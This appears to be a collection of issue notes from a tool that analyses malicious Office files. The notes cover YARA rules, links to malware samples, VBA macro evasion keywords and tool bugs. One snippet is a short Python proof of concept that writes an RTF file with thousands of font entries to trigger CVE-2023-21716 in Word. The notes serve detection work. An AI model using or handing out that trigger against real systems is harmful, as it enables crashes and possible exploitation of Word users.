Philippe Lagadec
See https://twitter.com/SI_FalconTeam/status/1633114934253965314 (YARA rule)

Another YARA rule: https://github.com/AmgdGocha/Detection-Rules/blob/main/CVE-2023-21716.yar

PoC: https://twitter.com/jduck/status/1632471544935923712

```python
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
```

See also https://github.com/gyaansastra/CVE-2023-21716
Check all the keywords mentioned in https://www.countercept.com/blog/dechaining-macros-and-evading-edr
See https://inquest.net/blog/2022/10/03/hiding-xml for an example of VBA macro using CustomXML to store a payload. Also a new keyword `ActiveDocument.CustomXMLParts` to be added: https://learn.microsoft.com/en-us/office/vba/api/Office.CustomXMLParts
Today the tests running on PyPy 2 trigger the following error on PyPy 2 (but not CPython 2):

```
/home/travis/virtualenv/pypy2.7-7.1.1/site-packages/msoffcrypto/method/rc4.py:5: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python...
```
See https://isc.sans.edu/diary/29174 Sample: https://bazaar.abuse.ch/sample/1c8cfccd2e45ea898125a62686ee97a1e923dfbbc8652889027d46b04aa5dc75/
example (technique used by icedid): https://twitter.com/filescan_itsec/status/1575841289718874115 https://isc.sans.edu//forums/diary/Word+Maldoc+With+CustomXML+and+Renamed+VBAProjectbin/29056/
When running oleobj on a PPT 97-2003 file (e.g. https://www.hybrid-analysis.com/sample/d1bceccf5d2b900a6b601c612346fdb3fa5bb0e2faeefcac3f9c29dc1d74838d/631b2c1d8501f5745e1ca88d), oleobj tries to parse it as an OpenXML file and triggers exceptions:

```
oleobj 0.60.1.dev5 - http://decalage.info/oletools THIS IS WORK...
```
This PR was automatically created by Snyk using the credentials of a real user. Snyk has created this PR to fix one or more vulnerable packages in the `pip` dependencies of...
https://cyber.gouv.fr/publications/guide-dhygiene-informatique
To scan containers (public Docker images) for vulnerabilities: https://containercve.com/ based on https://github.com/aquasecurity/trivy